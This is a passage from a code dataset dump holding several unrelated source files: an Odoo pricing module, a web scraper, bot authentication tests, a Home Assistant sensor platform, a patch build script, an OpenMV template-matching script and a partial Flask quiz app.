().\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU Affero General Public License as\r\n# published by the Free Software Foundation, either version 3 of the\r\n# License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU Affero General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Affero General Public License\r\n# along with this program. If not, see .\r\n#\r\n##############################################################################\r\n\r\nfrom osv import osv\r\nfrom osv import fields\r\nfrom tools.translate import _\r\nimport time\r\nimport pooler\r\n\r\n\r\nclass product_pct_platts_venta_cliente(osv.osv):\r\n _name = 'product.pct.platts.venta.cliente'\r\n\t\r\n def _precio_platts_usd(self,cr,uid,ids,field,arg,context=None):\r\n res = {}\r\n for obs in self.browse(cr, uid, ids, context=context):\r\n precio = obs.id_producto.precio_platts_aplicable_tonelada * obs.pct_platts\r\n res[obs.id] = precio\r\n \r\n return res\r\n\t\t\r\n _columns = {\r\n\t\t'id_producto' : fields.many2one('product.product','Producto asociado'),\r\n\t\t'id_cliente' : fields.many2one('res.partner','Cliente asociado'),\r\n 'pct_platts' : fields.float('Es el porcentaje de platts aplicable al cliente de ese producto', digits=(6, 5)),\r\n\t\t'precio_platts' : fields.function(_precio_platts_usd, type='float', string='Precio de referencia del Platts por tonelada(USD)', digits=(10, 5)),\r\n 'comentarios' : fields.text('Comentarios sobre el precio'),\r\n }\r\n\t\t\r\nclass product_product(osv.osv):\r\n _name = 'product.product'\r\n _inherit = 'product.product'\r\n \r\n \r\n def _precio_referencia_platts_usd(self,cr,uid,ids,field,arg,context=None):\r\n res = {}\r\n #ids_variables = self.pool.get('sale.variables.periodicas').search(cr, uid, [('active', '=', True)] , order = 'fecha')\r\n #if isinstance(ids_variables, (long, int)):\r\n # ids_variables = [ids_variables]\r\n #platts = self.pool.get('sale.variables.periodicas').browse(cr, uid, ids_variables, context=context)\r\n #precio_platts = platts[0].platts_valor \r\n for producto in self.browse(cr, uid, ids, context=context):\r\n precio_platts = producto.tipo_platts_aplicable.platts_valor\r\n try:\r\n #Se divide entre 2.2046 para cambiar de libras a kilos\r\n precio = precio_platts * 2.2046\r\n if (arg == 'kilo'):\r\n res[producto.id] = precio * 10\r\n else:\r\n res[producto.id] = precio * 10\r\n except:\r\n res[producto.id] = -1\r\n return res\r\n\t\t\r\n _columns = {\r\n 'metodo_calculo_precio_venta': fields.selection([('normal','Precio directo'), ('platts','Precio en base a Platts')],\r\n\t\t\t'Metodo de calculo de precio de compra'),\r\n\t\t'tipo_platts_aplicable' : fields.many2one('sale.variables.periodicas','Tipo de platts asociado al producto'),\r\n\t\t'pct_platts_venta_clientes' : fields.one2many('product.pct.platts.venta.cliente', 'id_producto', 'Porcentaje de platts aplicables a clientes'),\r\n\t\t'precio_platts_aplicable_kilo' : fields.function(_precio_referencia_platts_usd, arg='kilo', type='float', string='Precio de referencia del Platts (USD)', digits=(10, 5)),\r\n\t\t'precio_platts_aplicable_tonelada' : fields.function(_precio_referencia_platts_usd, arg='tonelada',type='float', string='Precio de referencia del Platts (USD)', digits=(10, 
5)),\r\n\t}\r\n\r\n\t\t\t\r\nproduct_product()\r\n\r\n\r\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\r\n\r\n","sub_path":"funofertiz_ventas/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"585006630","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nimport json\n\nurl = 'https://kazemai.github.io/fgo-vz/servant.html'\n\ndef writeToJSONFile(path,fileName, data):\n filePathNameWExt = './'+ path + fileName + '.json'\n with open(filePathNameWExt, 'w', encoding=\"utf-8\") as fp:\n json.dump(data, fp,ensure_ascii=False, indent=2)\n\n# firefox headless\nfireFoxOptions = webdriver.FirefoxOptions()\nfireFoxOptions.set_headless()\n\ndriver = webdriver.Firefox(firefox_options=fireFoxOptions)\n\ndriver.get(url)\npageSource = driver.page_source\n\nsoup = BeautifulSoup(pageSource, 'lxml') # 解析器\nresult = soup.find_all(\"tr\", class_=\"svtList\")\n\n# trun data into JSON format\ndata = []\nfor count, item in enumerate(result, start=1):\n dataObj = {}\n nameList = item.contents[3].get_text(\"|\").split(\"|\")\n dataObj[\"cName\"] = nameList[1].strip()\n dataObj[\"jName\"] = nameList[0].strip()\n dataObj[\"url\"] = \"https://kazemai.github.io/fgo-vz/\"+item.contents[3].a.get(\"href\")\n dataObj[\"ui\"] = item.contents[1].get_text()\n dataObj[\"rare\"] = len(item.contents[2].get_text())\n dataObj[\"class\"] = item.contents[4].img.get(\"title\")\n dataObj[\"baseHp\"] = item.contents[5].get_text()\n dataObj[\"maxHp\"] = item.contents[6].get_text()\n dataObj[\"baseAtt\"] = item.contents[7].get_text()\n dataObj[\"maxAtt\"] = item.contents[8].get_text()\n dataObj[\"cost\"] = item.contents[11].get_text()\n data.append(dataObj)\n\nwriteToJSONFile('webCrawling/','servent',data)\n\n\ndriver.quit()","sub_path":"webCrawling/crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"611639547","text":"import unittest\nfrom handler_test import MessageHandlerTest\nfrom authentication import Authenticator\nfrom user_pb2 import User\nimport pycountry\n\nclass AuthenticatorTest(MessageHandlerTest):\n \"\"\"\n Tests for the authenticator class.\n \"\"\"\n\n def setUp(self):\n super(AuthenticatorTest, self).setUp()\n # We are in the AuthenticatorTest, thus the user is authenticating.\n self.user.state = User.AUTHENTICATING\n\n # Modifies a bit the language configuration for as an exercise.\n self.config[\"languages\"] = \"ru,ar,el\"\n\n self.authenticator = Authenticator(\n self.db, self.users, self.config, mock = True)\n\n def getUserSubState(self):\n \"\"\"\n Returns the user substate as Authenticator.Substate\n \"\"\"\n return self.authenticator.substates[self.user.id]\n\n def testValidLanguages(self):\n self.assertEqual(len(self.authenticator.validLanguagesCodes), 3)\n\n def testHandle(self):\n \"\"\"\n This function is doing some routing, therefore just make sure it does\n run.\n \"\"\"\n msg = self.makeMessage()\n self.authenticator.handle(self.bot, msg)\n\n def testStart(self):\n \"\"\"\n Test that the state of the user after start is phone.\n \"\"\"\n msg = self.makeMessage()\n self.authenticator.start(self.bot, msg)\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.phone)\n\n def testReceiveNoPhone(self):\n \"\"\"\n Tests what happens when the user 
decline sharing his contact.\n \"\"\"\n msg = self.makeMessage()\n\n # The user does not want to share his contact information\n msg.is_contact = False\n msg.text = \"No thanks!\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertFalse(self.user.who.HasField(\"phone_number\"))\n self.assertFalse(self.user.where.HasField(\"country_code\"))\n self.assertFalse(self.user.where.HasField(\"country\"))\n self.assertFalse(self.user.languages.HasField(\"mother_tongue\"))\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.email)\n\n def testReceiveTextInsteadOfPhone(self):\n \"\"\"\n Tests what happens when the user decline sharing his contact.\n \"\"\"\n msg = self.makeMessage()\n\n # The user entered some text instead of clicking. Ask again.\n msg.is_contact = False\n msg.text = \"Nope\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.phone)\n\n def testReceiveValidPhone(self):\n \"\"\"\n Test that when receiving the phone number, the country and locale of\n the user are well defined.\n \"\"\"\n msg = self.makeMessage()\n\n # Brazilian phone number\n msg.is_contact = True\n phone = \"5531991457647\"\n msg.text = phone\n self.authenticator.receivePhone(self.bot, msg)\n\n self.assertEqual(self.user.who.phone_number, \"+\" + phone)\n self.assertEqual(self.user.where.country_code, \"BR\")\n self.assertEqual(self.user.where.country, \"Brazil\")\n self.assertEqual(self.user.languages.mother_tongue, \"pt\")\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.email)\n\n # Canadian phone number\n msg.text = \"14168471900\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertEqual(self.user.where.country_code, \"CA\")\n self.assertEqual(self.user.where.country, \"Canada\")\n self.assertEqual(self.user.languages.mother_tongue, \"en\")\n self.assertTrue(self.getUserSubState(), Authenticator.Substate.email)\n\n # Cypriot phone number\n msg.text = \"35722585300\"\n self.authenticator.receivePhone(self.bot, msg)\n self.assertEqual(self.user.where.country_code, \"CY\")\n self.assertEqual(self.user.where.country, \"Cyprus\")\n self.assertEqual(self.user.languages.mother_tongue, \"el\")\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.email)\n\n def testReceiveValidEmail(self):\n \"\"\"\n Check that if a correct email is provided the user changes states\n and that if not we stay in the same state.\n \"\"\"\n msg = self.makeMessage()\n\n # Valid email syntax: go to confirmation state\n msg.text = \"example@example.org\"\n self.authenticator.receiveEmail(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.confirmation)\n\n def testReceiveInvalidEmail(self):\n \"\"\"\n Check that if a correct email is provided the user changes states\n and that if not we stay in the same state.\n \"\"\"\n msg = self.makeMessage()\n\n # Invalid email syntax: stay in state email\n msg.text = \"example@example\"\n self.authenticator.receiveEmail(self.bot, msg)\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.email)\n\n # Invalid email syntax\n msg.text = \"example\"\n self.authenticator.receiveEmail(self.bot, msg)\n self.assertEqual(self.getUserSubState(), Authenticator.Substate.email)\n\n def testReceiveInvalidConfirmation(self):\n \"\"\"\n Tests the flow when the confirmation key is incorrect.\n \"\"\"\n msg = self.makeMessage()\n key = \"abcde\"\n self.authenticator.confirmation[msg.sender_id] = key\n\n msg.text = \"bobo\"\n 
self.authenticator.receiveConfirmation(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.confirmation)\n\n def testReceiveValidConfirmation(self):\n \"\"\"\n Tests the flow when the confirmation key is correct and copy-pasted.\n \"\"\"\n msg = self.makeMessage()\n key = \"abcde\"\n self.authenticator.confirmation[msg.sender_id] = key\n\n msg.text = key\n self.authenticator.receiveConfirmation(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.brother_tongue)\n\n def testReceiveValidConfirmationFromLink(self):\n \"\"\"\n Tests the flow when the confirmation key is correct and comes from link.\n \"\"\"\n msg = self.makeMessage()\n key = \"abcde\"\n self.authenticator.confirmation[msg.sender_id] = key\n\n msg.text = \"/start \" + key\n self.authenticator.receiveConfirmation(self.bot, msg)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.brother_tongue)\n\n def testReceiveValidBrotherTongue(self):\n \"\"\"\n Test that the substate is deleted and that the state is then IDLE.\n \"\"\"\n msg = self.makeMessage()\n code = self.authenticator.validLanguagesCodes[0]\n msg.text = pycountry.languages.get(iso639_1_code = code).name\n\n self.authenticator.substates[self.user.id] = \\\n Authenticator.Substate.brother_tongue\n\n self.authenticator.receiveBrotherTongue(self.bot, msg)\n self.assertFalse(self.user.id in self.authenticator.substates)\n self.assertEqual(self.user.state, User.IDLE)\n\n def testReceiveInvalidBrotherTongue(self):\n \"\"\"\n Tests that the user stays in state brother_tongue is the brother_tongue\n entered is invalid.\n \"\"\"\n msg = self.makeMessage()\n msg.text = \"hebrew\"\n\n self.authenticator.receiveBrotherTongue(self.bot, msg)\n self.assertTrue(self.user.id in self.authenticator.substates)\n self.assertEqual(self.user.state, User.AUTHENTICATING)\n self.assertEqual(\n self.getUserSubState(), Authenticator.Substate.brother_tongue)\n\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(AuthenticatorTest)\n unittest.TextTestRunner().run(suite)\n","sub_path":"src/authentication_test.py","file_name":"authentication_test.py","file_ext":"py","file_size_in_byte":7802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"508591590","text":"\n\nclass DictionaryMaker:\n def make_dict(self, data, format):\n handler = get_handler(format)\n return handler(data)\n\n\ndef get_handler(format):\n if format == 'JSON':\n return _json_to_dict\n elif format == 'TEXT':\n return _text_to_dict\n elif format == 'XML':\n return _xml_to_dict\n else:\n raise ValueError(format)\n\n\ndef _json_to_dict(data):\n action_1 = ':('\n action_2 = ':|'\n action_3 = ':)'\n dictionary = 'this is a dictionary'\n return dictionary\n\n\ndef _text_to_dict(data):\n complex_action_with_ML = 'uiii'\n dictionary = 'this is a dictionary'\n return dictionary\n\ndef _xml_to_dict(data):\n action_1 = 'arrr'\n complex_action_with_ML = 'uiii'\n dictionary = 'this is a dictionary'\n return dictionary","sub_path":"1_home_work.py","file_name":"1_home_work.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"604971542","text":"from __future__ import annotations\nfrom homeassistant import config_entries, core\nfrom homeassistant.components.binary_sensor import 
(\n\tBinarySensorEntity,\n\tDEVICE_CLASS_CONNECTIVITY,\n\tDEVICE_CLASS_DOOR,\n\tDEVICE_CLASS_GARAGE_DOOR,\n\tDEVICE_CLASS_GAS,\n\tDEVICE_CLASS_LOCK,\n\tDEVICE_CLASS_MOISTURE,\n\tDEVICE_CLASS_MOTION,\n\tDEVICE_CLASS_PROBLEM,\n\tDEVICE_CLASS_SMOKE,\n\tDEVICE_CLASS_TAMPER,\n\tDEVICE_CLASS_WINDOW,\n)\nfrom homeassistant.const import (\n\tENTITY_CATEGORY_DIAGNOSTIC,\n\tSTATE_ON,\n)\nfrom typing import Final\nfrom .const import (\n\tDATA_JABLOTRON,\n\tDEVICE_MOTION_DETECTOR,\n\tDEVICE_WINDOW_OPENING_DETECTOR,\n\tDEVICE_DOOR_OPENING_DETECTOR,\n\tDEVICE_GARAGE_DOOR_OPENING_DETECTOR,\n\tDEVICE_GLASS_BREAK_DETECTOR,\n\tDEVICE_SMOKE_DETECTOR,\n\tDEVICE_FLOOD_DETECTOR,\n\tDEVICE_GAS_DETECTOR,\n\tDEVICE_KEY_FOB,\n\tDEVICE_SIREN_INDOOR,\n\tDEVICE_BUTTON,\n\tDEVICE_THERMOSTAT,\n\tDEVICE_LOCK,\n\tDEVICE_TAMPER,\n\tDOMAIN,\n)\nfrom .jablotron import Jablotron, JablotronDevice, JablotronEntity\n\nDEVICE_CLASSES: Final = {\n\tDEVICE_MOTION_DETECTOR: DEVICE_CLASS_MOTION,\n\tDEVICE_WINDOW_OPENING_DETECTOR: DEVICE_CLASS_WINDOW,\n\tDEVICE_DOOR_OPENING_DETECTOR: DEVICE_CLASS_DOOR,\n\tDEVICE_GARAGE_DOOR_OPENING_DETECTOR: DEVICE_CLASS_GARAGE_DOOR,\n\tDEVICE_FLOOD_DETECTOR: DEVICE_CLASS_MOISTURE,\n\tDEVICE_GAS_DETECTOR: DEVICE_CLASS_GAS,\n\tDEVICE_SMOKE_DETECTOR: DEVICE_CLASS_SMOKE,\n\tDEVICE_LOCK: DEVICE_CLASS_LOCK,\n\tDEVICE_TAMPER: DEVICE_CLASS_TAMPER,\n}\n\n\nasync def async_setup_entry(hass: core.HomeAssistant, config_entry: config_entries.ConfigEntry, async_add_entities) -> None:\n\tjablotron = hass.data[DOMAIN][config_entry.entry_id][DATA_JABLOTRON]\n\n\tasync_add_entities((JablotronDeviceSensorEntity(jablotron, control) for control in jablotron.device_sensors()))\n\n\tasync_add_entities((JablotronProblemSensorEntity(jablotron, control) for control in jablotron.section_problem_sensors()))\n\tasync_add_entities((JablotronProblemSensorEntity(jablotron, control) for control in jablotron.device_problem_sensors()))\n\n\tlan_connection = jablotron.lan_connection()\n\tif lan_connection is not None:\n\t\tasync_add_entities([JablotronLanConnectionEntity(jablotron, lan_connection)])\n\n\tgsm_signal_sensor = jablotron.gsm_signal_sensor()\n\tif gsm_signal_sensor is not None:\n\t\tasync_add_entities([JablotronGsmSignalEntity(jablotron, gsm_signal_sensor)])\n\n\nclass JablotronBinarySensor(JablotronEntity, BinarySensorEntity):\n\n\tdef _update_attributes(self) -> None:\n\t\tsuper()._update_attributes()\n\n\t\tself._attr_is_on = self._get_state() == STATE_ON\n\n\nclass JablotronProblemSensorEntity(JablotronBinarySensor):\n\n\t_attr_device_class = DEVICE_CLASS_PROBLEM\n\t_attr_entity_category = ENTITY_CATEGORY_DIAGNOSTIC\n\n\nclass JablotronDeviceSensorEntity(JablotronBinarySensor):\n\n\t_control: JablotronDevice\n\n\tdef __init__(\n\t\tself,\n\t\tjablotron: Jablotron,\n\t\tcontrol: JablotronDevice,\n\t) -> None:\n\n\t\tself._attr_device_class = DEVICE_CLASSES[control.type] if control.type in DEVICE_CLASSES else None\n\n\t\tsuper().__init__(jablotron, control)\n\n\tdef _update_attributes(self) -> None:\n\t\tsuper()._update_attributes()\n\n\t\tif self._control.type == DEVICE_GLASS_BREAK_DETECTOR:\n\t\t\tself._attr_icon = \"mdi:image-broken-variant\" if self._attr_is_on else \"mdi:square-outline\"\n\t\telif self._control.type in (DEVICE_KEY_FOB, DEVICE_BUTTON):\n\t\t\tself._attr_icon = \"mdi:gesture-double-tap\" if self._attr_is_on else \"mdi:circle-double\"\n\t\telif self._control.type == DEVICE_SIREN_INDOOR:\n\t\t\tself._attr_icon = \"mdi:gesture-tap-box\" if self._attr_is_on else \"mdi:circle-box-outline\"\n\t\telif 
self._control.type == DEVICE_THERMOSTAT:\n\t\t\tself._attr_icon = \"mdi:thermometer\" if self._attr_is_on else \"mdi:thermometer-off\"\n\n\nclass JablotronLanConnectionEntity(JablotronBinarySensor):\n\n\t_attr_device_class = DEVICE_CLASS_CONNECTIVITY\n\t_attr_entity_category = ENTITY_CATEGORY_DIAGNOSTIC\n\n\nclass JablotronGsmSignalEntity(JablotronBinarySensor):\n\n\t_attr_device_class = DEVICE_CLASS_CONNECTIVITY\n\t_attr_entity_category = ENTITY_CATEGORY_DIAGNOSTIC\n\n\tdef _update_attributes(self) -> None:\n\t\tsuper()._update_attributes()\n\n\t\tself._attr_icon = \"mdi:signal\" if self._attr_is_on else \"mdi:signal-off\"\n","sub_path":"custom_components/jablotron100/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"144241022","text":"import shutil\nfrom pathlib import Path\nfrom subprocess import CalledProcessError, run\nfrom urllib.request import urlopen\n\nfrom argh import CommandError, wrap_errors, arg, ArghParser\n\nfrom . import *\n\n\ndef handle_exc(e):\n if isinstance(e, CalledProcessError):\n return 'Error executing command \"{}\"'.format(' '.join(e.cmd))\n elif isinstance(e, JDiffException):\n return f\"Error running JDiff: {e}\"\n else:\n raise RuntimeError(\"Unexpected exception\") from e\n\n\n@wrap_errors([CalledProcessError], processor=handle_exc)\ndef setup():\n \"\"\"Setup the development environment, re-applying all the Paper and TacoSpigot patches.\"\"\"\n WORK_DIR.mkdir(exist_ok=True)\n repository = Path(Path.cwd(), \"TacoSpigot\")\n if not repository.exists():\n raise CommandError(\"TacoSpigot repository not found!\")\n print(\"---- Cleaning TacoSpigot\")\n run([\"bash\", \"clean.sh\"], cwd=repository, check=True)\n print(\"---- Preparing upstream repositories\")\n run([\"bash\", \"prepare-build.sh\"], cwd=repository, check=True)\n if not JDIFF_JAR.exists():\n print(f\"---- Downloading JDiff {JDIFF_VERSION}\")\n with urlopen(JDIFF_URL) as r:\n with open(JDIFF_JAR, 'wb+') as f:\n shutil.copyfileobj(r, f)\n\n\n@wrap_errors([JDiffException, CalledProcessError], processor=handle_exc)\n@arg('--quiet', help=\"Only print messages when errors occur\")\ndef patch(quiet=False):\n \"\"\"Applies the patch files to the working directory, overriding any existing work.\"\"\"\n server_repo = Path(Path.cwd(), \"TacoSpigot\", \"TacoSpigot-Server\")\n if not server_repo.exists():\n raise CommandError(\"Couldn't find TacoSpigot-Server\")\n tacospigot_sources = Path(server_repo, \"src\", \"main\", \"java\")\n if not tacospigot_sources.exists():\n raise CommandError(\"Couldn't find TacoSpigot sources!\")\n mojang_sources = Path(PAPER_WORK_DIR, minecraft_version())\n if not mojang_sources.exists():\n raise CommandError(\"Couldn't find mojang sources!\")\n unpatched_sources = Path(WORK_DIR, \"unpatched\")\n if unpatched_sources.exists():\n print(\"---- Reusing cached original sources\")\n else:\n print(\"---- Copying original sources from TacoSpigot\")\n shutil.copytree(tacospigot_sources, unpatched_sources)\n # Copy the remaining mc-dev sources that aren't already in TacoSpigot\n # This makes it so we don't have to depend on the mojang server fat jar,\n # giving us complete control over our dependencies.\n print(\"---- Copying remaining sources from decompiled mojang jar\")\n mojang_nms_sources = Path(mojang_sources, \"net/minecraft/server\")\n unpatched_nms_sources = Path(unpatched_sources, \"net/minecraft/server\")\n for file in 
mojang_nms_sources.iterdir():\n assert not file.is_dir(), f\"Unexpected directory: {file}\"\n unpatched_file = Path(unpatched_nms_sources, file.name)\n if not unpatched_file.exists():\n shutil.copy2(file, unpatched_file)\n patches = Path(Path.cwd(), \"patches\")\n patches.mkdir(exist_ok=True)\n patched_sources = Path(Path.cwd(), \"patched\")\n if patched_sources.exists():\n print(\"---- Clearing existing patched sources\")\n shutil.rmtree(patched_sources)\n print(\"---- Copying unpatched sources into patched directory\")\n shutil.copytree(unpatched_sources, patched_sources)\n if not patches.exists() or not list(patches.iterdir()):\n print(\"---- No patches to apply\")\n return\n print(\"---- Applying Fountain patches via JDiff\")\n run_jdiff(\"patch\", unpatched_sources, patched_sources, patches, quiet=quiet)\n\n@wrap_errors([JDiffException, CalledProcessError], processor=handle_exc)\n@arg('--quiet', help=\"Only print messages when errors occur\")\ndef diff(quiet=False):\n \"\"\"Regenerates the patch files from the contents of the working directory.\"\"\"\n unpatched_sources = Path(WORK_DIR, \"unpatched\")\n if not unpatched_sources.exists():\n raise CommandError(\"Couldn't find unpatched sources!\")\n patched_dir = Path(Path.cwd(), \"patched\")\n if not patched_dir.exists():\n raise CommandError(\"No patched files found!\")\n patches = Path(Path.cwd(), \"patches\")\n patches.mkdir(exist_ok=True)\n print(\"---- Recomputing Fountain patches via JDiff\")\n run_jdiff(\"diff\", unpatched_sources, patched_dir, patches, quiet=quiet)\n\nif __name__ == \"__main__\":\n parser = ArghParser(prog=\"fountain.sh\", description=\"The TacoFountain build system\")\n parser.add_commands([setup, patch, diff])\n parser.dispatch()\n","sub_path":"scripts/fountain/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"631200128","text":"# Template Matching Example - Normalized Cross Correlation (NCC)\r\n#\r\n# This example shows off how to use the NCC feature of your OpenMV Cam to match\r\n# image patches to parts of an image... expect for extremely controlled enviorments\r\n# NCC is not all to useful.\r\n#\r\n# WARNING: NCC supports needs to be reworked! As of right now this feature needs\r\n# a lot of work to be made into somethin useful. This script will reamin to show\r\n# that the functionality exists, but, in its current state is inadequate.\r\n\r\nimport time, sensor, image, pyb, ustruct\r\nfrom image import SEARCH_EX, SEARCH_DS\r\nfrom pyb import LED\r\nfrom pyb import UART\r\n\r\n# Reset sensor\r\nsensor.reset()\r\n\r\n# Set sensor settings\r\nsensor.set_contrast(1)\r\nsensor.set_gainceiling(16)\r\n# Max resolution for template matching with SEARCH_EX is QQVGA\r\nsensor.set_framesize(sensor.QQVGA)\r\n# You can set windowing to reduce the search image.\r\n#sensor.set_windowing(((640-80)//2, (480-60)//2, 80, 60))\r\nsensor.set_pixformat(sensor.GRAYSCALE)\r\nuart = UART(3, 9600)\r\n\r\nred_led = LED(1)\r\ngreen_led = LED(2)\r\nblue_led = LED(3)\r\nblue_led.on()\r\n\r\n# Load template.\r\n# Template should be a small (eg. 
32x32 pixels) grayscale image.\r\nleft18_1 = image.Image(\"left18_head.pgm\")\r\nleft18_2 = image.Image(\"left18_mid.pgm\")\r\nright18_1 = image.Image(\"right18_head.pgm\")\r\nright18_2 = image.Image(\"right18_mid.pgm\")\r\nleft25_1 = image.Image(\"left25_head.pgm\")\r\nleft25_2 = image.Image(\"left25_mid.pgm\")\r\nright25_1 = image.Image(\"right25_head.pgm\")\r\nright25_2 = image.Image(\"right25_mid.pgm\")\r\nleft40_1 = image.Image(\"left40_head.pgm\")\r\nleft40_2 = image.Image(\"left40_mid.pgm\")\r\nright40_1 = image.Image(\"right40_head.pgm\")\r\nright40_2 = image.Image(\"right40_mid.pgm\")\r\nuart.write(\"123\")\r\nclock = time.clock()\r\n\r\n\r\n\r\ndef match(left1, left2, right1, right2):\r\n # Run template matching\r\n blue_led.off()\r\n green_led.on()\r\n clock.tick()\r\n img = sensor.snapshot()\r\n\r\n # find_template(template, threshold, [roi, step, search])\r\n # ROI: The region of interest tuple (x, y, w, h).\r\n # Step: The loop step used (y+=step, x+=step) use a bigger step to make it faster.\r\n # Search is either image.SEARCH_EX for exhaustive search or image.SEARCH_DS for diamond search\r\n #\r\n # Note1: ROI has to be smaller than the image and bigger than the template.\r\n # Note2: In diamond search, step and ROI are both ignored.\r\n l_1 = img.find_template(left1, 0.85, step=3, search=SEARCH_DS) #, roi=(10, 0, 60, 60))\r\n l_2 = img.find_template(left2, 0.8, step=3, search=SEARCH_DS)\r\n r_1 = img.find_template(right1, 0.85, step=3, search=SEARCH_DS) #, roi=(10, 0, 60, 60))\r\n r_2 = img.find_template(right2, 0.8, step=3, search=SEARCH_DS)\r\n if ((l_1 and l_2) and (not (r_1 and r_2))): #left 2\r\n uart.write(\"[2]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"left\")\r\n blue_led.off()\r\n elif ((r_1 and r_2) and (not (l_1 and l_2))):#right 1\r\n uart.write(\"[1]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"right\")\r\n blue_led.off()\r\n elif ((l_1 or l_2) and (not (r_1 and r_2))):#left 2\r\n uart.write(\"[2]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"special_left\")\r\n blue_led.off()\r\n elif ((r_1 or r_2) and (not (l_1 and l_2))):#right 1\r\n uart.write(\"[1]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n blue_led.on()\r\n print(\"special_right\")\r\n blue_led.off()\r\n else:\r\n uart.write(\"[0]\")\r\n start = pyb.millis()\r\n while pyb.elapsed_millis(start)<200 :\r\n red_led.on()\r\n print(\"sb\")\r\n red_led.off()\r\n\r\nwhile True:\r\n match(left18_1, left18_2, right18_1, right18_2)\r\n match(left25_1, left25_2, right25_1, right25_2)\r\n match(left40_1, left40_2, right40_1, right40_2)\r\n","sub_path":"F8_template/F8_template_matching.py","file_name":"F8_template_matching.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"233060318","text":"from flask import Flask, render_template,session,request,redirect,url_for,make_response\nfrom flask_sqlalchemy import SQLAlchemy\nimport random\nimport datetime\nimport os\napp= Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI']=os.environ.get(\"DATABASE_URL\")\napp.config['SECRET_KEY']='1x25d1d63s4ddnant'\ndb=SQLAlchemy(app)\nclass User(db.Model):\n id=db.Column(db.Integer(), primary_key=True)\n username=db.Column(db.String(30), nullable=False, unique=False)\n email_address=db.Column(db.String(50), nullable=False, unique=False)\n 
marks=db.Column(db.Integer(),nullable=False,default=0)\n date=db.Column(db.String(20),nullable=False)\nclass Question(db.Model):\n id=db.Column(db.Integer(), primary_key=True)\n question = db.Column(db.String(1024), nullable=False, unique=True)\n option_1 = db.Column(db.String(1024), nullable=False, unique=False)\n option_2 = db.Column(db.String(1024), nullable=False, unique=False)\n option_3 = db.Column(db.String(1024), nullable=False, unique=False)\n option_4 = db.Column(db.String(1024), nullable=False, unique=False)\n answer = db.Column(db.Integer(),nullable=False,unique=False)\nclass Admin_log(db.Model):\n id = db.Column(db.Integer(), primary_key=True)\n ip=db.Column(db.String(20),nullable=False)\n#question=[]\n@app.route('/')\n@app.route('/login')\ndef index():\n session[\"name\"] =\"\"\n session[\"email\"]=\"\"\n session[\"flag\"] =0\n session['complete']=False\n session[\"access\"]=0\n session[\"questionsa\"]=[]\n return render_template('login.html')\n@app.route('/quest',methods=[\"GET\",\"POST\"])\ndef quest():\n if request.method==\"POST\":\n session[\"name\"] = request.form.get(\"username\")\n session[\"email\"] = request.form.get(\"email\")\n session['marks']=0\n session[\"flag\"]=0\n all_q = Question.query.all()\n question = []\n for q in all_q:\n question.append(q)\n #print(question)\n total = 5\n question = random.sample(question, total)\n\n mn = []\n\n for i in question :\n d = {}\n d['question'] = i.question\n d['option_1'] = i.option_1\n d['option_2'] = i.option_2\n d['option_3'] = i.option_3\n d['option_4'] = i.option_4\n d['answer'] = i.answer\n mn.append(d)\n session[\"questionsa\"] = mn\n return redirect('/questions',code=302)\n return redirect(\"login.html\",code=302)\n@app.route('/questions',methods=[\"GET\",\"POST\"])\ndef generated_question():\n question = session[\"questionsa\"]\n if session['complete']:\n return redirect('/',code=\"302\")\n #print(len(question))\n try:\n if session['flag']==0:\n session['flag']=1;\n return render_template(\"question.html\", q=question[0], que=5-len(question)+1)\n x=question[0]\n except:\n return \"
ACCESS DENIED
